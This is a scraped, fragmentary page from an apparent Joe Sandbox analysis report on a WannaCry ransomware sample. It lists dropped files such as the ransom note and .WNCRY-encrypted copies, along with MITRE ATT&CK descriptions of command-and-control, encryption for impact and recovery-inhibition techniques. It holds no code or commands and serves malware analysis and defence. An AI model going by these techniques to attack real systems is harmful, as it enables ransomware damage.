Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Wannacry.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\@Please_Read_Me@.txt

C:\@WanaDecryptor@.exe

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-03.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-14.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-22.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2022-02-23.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2023-05-25.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2023-05-26.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2023-08-05.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)

Windows Analysis Report
Wannacry.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Network protocol analysis
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of Data Destruction and Data Encrypted for Impact .
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Services, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.
Tactics:	Impact
Data Sources:	Packet capture, Packet capture, Web application firewall logs, Web logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre